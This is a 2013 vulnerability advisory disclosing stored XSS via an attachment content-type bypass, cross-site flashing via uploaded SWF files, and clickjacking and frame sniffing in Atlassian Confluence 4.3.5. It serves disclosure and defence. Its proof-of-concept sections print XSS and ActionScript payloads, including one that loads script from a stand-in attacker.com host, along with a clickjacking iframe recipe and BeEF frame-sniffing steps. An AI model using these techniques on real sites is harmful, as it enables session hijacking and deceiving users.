Atlassian Confluence Multiple Vulnerabilities (DS-2013-005)

Jul 11, 2013

 

  • Affected Vendor: Atlassian
  • Affected Software: Confluence
  • Affected Version: 4.3.5. Other earlier versions may be affected.
  • Issue type: Cross-Site Scripting, Cross-Site Flashing, Click Jacking
  • Release Date: 11 July 2013
  • Discovered by: Andrew Horton, Sow Ching Shiong, Mahendra
  • Issue status: Patch available (unverified)

Summary

Security researchers Andrew Horton, Sow Ching Shiong and Mahendra discovered persistent cross-site scripting, persistent cross-site flashing, and insufficient framing protection vulnerabilities in Confluence version 4.3.5. The latest fully patched version of the application was used at the time of discovery.

 

The persistent cross-site scripting and cross-site flashing vulnerabilities enable an attacker with a user account on the Atlassian Confluence web application, to specially craft a Confluence webpage that will hijack the session of users who visit that page. This can be used by an attacker to elevate privileges from a basic user account, to an administrative account after any administrative user visits the webpage.

 

The insufficient framing protection vulnerability enables an attacker without a user account, to lure an authenticated user into following an untrusted link, click on a webpage, and perform unwanted actions. A harmless example is to update a user’s profile with new information.

 

Persistent Cross-site Scripting

The vulnerability is caused by insufficient controls in the application to prevent JavaScript content executing that is included in user uploaded files. When a user uploads a file as an attachment to a wiki page, the web application chooses whether to allow the file to be rendered in-line based on the filename extension and the provided content-type. It is possible to bypass these controls and upload a file containing JavaScript content that will execute JavaScript in a user’s web browser.

 

Persistent Cross-site Flashing

The vulnerability exists because the application has a design flaw that allows Adobe Flash files to be uploaded, and Flash files can trigger JavaScript to be executed. Cross-site flashing vulnerabilities are similar in impact to cross-site scripting.

 

Insufficient Framing Protection

Framing involves placing one webpage within another webpage by use of the iframe HTML element. One familiar use of iframes is to embed maps within web pages. When a website is framed within another untrusted webpage, various attacks are possible including click jacking and frame sniffing.

 

Persistent Cross-site Scripting

Description

Cross-site scripting vulnerabilities exist when an attacker can cause arbitrary JavaScript into be included within a response from a web application. Persistent cross-site scripting occurs when the JavaScript payload is stored in the web application and presented to another user of the web application at a later time.

 

Throughout most of the Atlassian Confluence web application, there is adequate user input validation and output sanitization to protect against cross-site scripting however the attachment upload functionality can be abused to perform this attack.

 

When a user uploads a file as an attachment to a wiki page, the web application chooses whether to render the content in-line or provide it as a downloadable file depending on the filename extension and the user provided content-type. HTML files are restricted from being rendered in-line. However, it is possible to bypass these controls and upload a file containing JavaScript content that will be rendered as HTML in the web browser. This can be achieved by uploading a filename that does not contain an “HTML” extension, and providing a user supplied content-type that is set to something other than “text/html”.

 

Impact

This vulnerability can be used to perform unwanted actions on a user’s behalf, and to perform a session hijacking attack by injecting malicious JavaScript.

 

Affected products

This vulnerability was discovered in default installations of Confluence 4.3.5. Other earlier versions may also be affected.

 

Proof of concept

To demonstrate the persistent cross-site scripting, follow the steps below.

  • Create a file that contains a cross-site scripting payload such as the following example:
    <html><body><script>alert(1);</script></body></html>
  • Add an attachment to a wiki page.
  • Use your proxy software to intercept the POST request that uploads the attachment file. Alter the user supplied content-type to a value other than “text/html” and ensure that the filename does not contain the suffix, “.html”  as shown below.
  • Observe that the attached file has been uploaded.
  • Follow the attached file link and observe that cross-site scripting occurs.

Solution

Upgrade to Atlassian Confluence version 4.3.7. Note that Detica has not verified this issue is resolved.

 

Persistent Cross-site Flashing

Description

Cross-site flashing vulnerabilities exist when an attacker can cause arbitrary JavaScript into be executed from within a Flash file in a web application. Persistent cross-site scripting occurs when the JavaScript payload is stored in the web application and presented to another user of the web application at a later time.

 

The vulnerability is due to a design flaw in the application that allows Adobe Flash files to be uploaded, and Flash files can trigger JavaScript to be executed. Cross-site flashing vulnerabilities are similar in impact to cross-site scripting.

 

This vulnerability is more easily exploited than the persistent cross-site scripting vulnerability as the JavaScript can be automatically executed upon viewing a webpage on the wiki.

 

A variety of methods are available within the ActionScript language to execute JavaScript from within a Flash file. These methods include, but are not limited to the following examples:

  • ExternalInterface.call("document.write","<script>alert(1)</script>");
  • navigateToURL(new URLRequest("Javascript: document.write(\"<script>alert(1)</scr\"+\"ipt>\")"),"_self")
  • ExternalInterface.call("eval","myWindow=window.open('','','width=200,height=100');myWindow.document.write(\"<html><head><script src=\'http://attacker.com/evil.js\'></script></head><body>hi</body></html>\");myWindow.focus()");

Impact

This vulnerability can be used to perform unwanted actions on a user’s behalf, and to perform a session hijacking attack by injecting malicious JavaScript.

 

Affected products

This vulnerability was discovered in default installations of Confluence 4.3.5. Other earlier versions may also be affected.

 

Proof of concept

To demonstrate the stored cross-site flashing, which is similar in impact to cross-site scripting, follow the steps below.

  •  Create a new page in the wiki.
  • Add an attachment, upload an SWF file which triggers JavaScript. A ability to upload an SWF file to the web server is considered insecure in isolation.
  • Insert a media macro object to the wiki page.
  • Select the attachment you just uploaded as the media file ti insert into the page.
  • Verify that the Flash object is embedded within the page.
  • Save the page and verify that the stored cross-site flashing occurs when the page is viewed. In this case, the SWF cause an alert box to popup to demonstrate the ability to execute arbitrary JavaScript.

Solution

Upgrade to Atlassian Confluence version 4.3.7. Note that Detica has not verified this issue is resolved.

 

Insufficient Framing Prevention

Description

Framing involves placing one webpage within another webpage by use of the iframe HTML element. One familiar use of iframes is to embed maps within web pages.

 

When a website is framed within another untrusted webpage, various attacks are possible including click jacking and frame sniffing.

 

To perform a click jacking attack, an attacker must lure an authenticated user into following an untrusted link, then entice the user into clicking on the web page. The attacker will set up a web page that contains the Confluence web application within an iframe that is made invisible. The user will unwittingly click on a button or link within Confluence causing an unwanted action. The iframe is made invisible by setting the CSS opacity property, it is placed on top of other elements by using the CSS z-index property, and it is lined up with a visible decoy button by using CSS absolute positioning.

 

Frame sniffing attacks require that a user be lured into following an untrusted link. The attack requires placing Confluence within an iframe, then attempting to scroll the iframe to various anchor names. The parent web page can determine whether the scrolling is successful which leaks details about the iframe’s content.

 

Impact

Click jacking can be used to perform a limited set of unwanted actions on a user’s behalf. One example of an attack is to update a user’s profile with new information for fields such as ‘About Me’, and to update the user’s website link. This is made possible by the ability to populate form fields by setting URL parameters.

 

Frame sniffing can be used to elicit information from the Confluence web application, for example it can be used to determine which of a set of company names are searchable using the Confluence search functionality.

 

Affected products

This vulnerability was discovered in default installations of Confluence 4.3.5. Other earlier versions may also be affected.

 

Proof of concept for Frame Sniffing

Note that some web browsers provide protection against frame sniffing. Testing was performed using the latest Firefox.

 

To exploit this issue follow these steps:

  • Lure an authenticated user to a webpage that contains a BeEF (Browser Exploitation Framework) hook.
  • Use the iFrame Sniffer module.
    • Set the input URL to : https://host.local/dosearchsite.action?queryString=apple
    • Set the anchors to check to : search-results-body
  • Click Execute
  • Check the response. If the anchor, #search-results-body exists then the search term ‘apple’ can be found within the Confluence web application.


A secondary exploit to determine whether a user is logged in:

  • Lure a user to a webpage that contains a BeEF (Browser Exploitation Framework) hook.
  • Use the iFrame Sniffer module.
    • Set the input URL to : https://host.local/login.action
    • Set the anchors to check to : forgot-password
  • Click Execute
  • Check the response. If the anchor, #forgot-password exists then the user is not currently logged into the Confluence web application.

Proof of concept for Click Jacking

To exploit this issue follow these steps:

  • Create a web page that contains the following URL in an iframe,
    • https://host.local/users/editmyprofile.action?personalInformation=I%20got%20clickjacked&userparam-website=http://phishing.com/
  • Set the CSS properties for the iframe to:
    • z-index:10; opacity:0;
  • Place an image on the web page underneath the ‘Save’ button
  • Lure an authenticated Confluence user into following an untrusted link and clicking

The screen shot below shows the ‘Save’ button as semi-opaque.

 

Solution

Upgrade to Atlassian Confluence version 4.3.7. Note that Detica has not verified this issue is resolved.

 

Response timeline

  • 04/02/2013 - Vendor notified.
  • 04/02/2013 - Vendor acknowledges receipt of advisory.
  • 04/02/2013 - Vendor confirms issue presence and claims they were already aware of some of these issues at https://jira.atlassian.com/browse/CONF-27973.
  • 21/05/2013 – Vendor advises that these security issues are resolved on their bug tracking JIRA system at https://jira.atlassian.com/browse/CONF-27973.
  • 10/07/2013 – Detica has not verified the veracity of the vendor resolution.
  • 10/07/2013 - This advisory is published.

References

  • Vendor advisory: The vendor, Atlassian has chosen not to issue an advisory.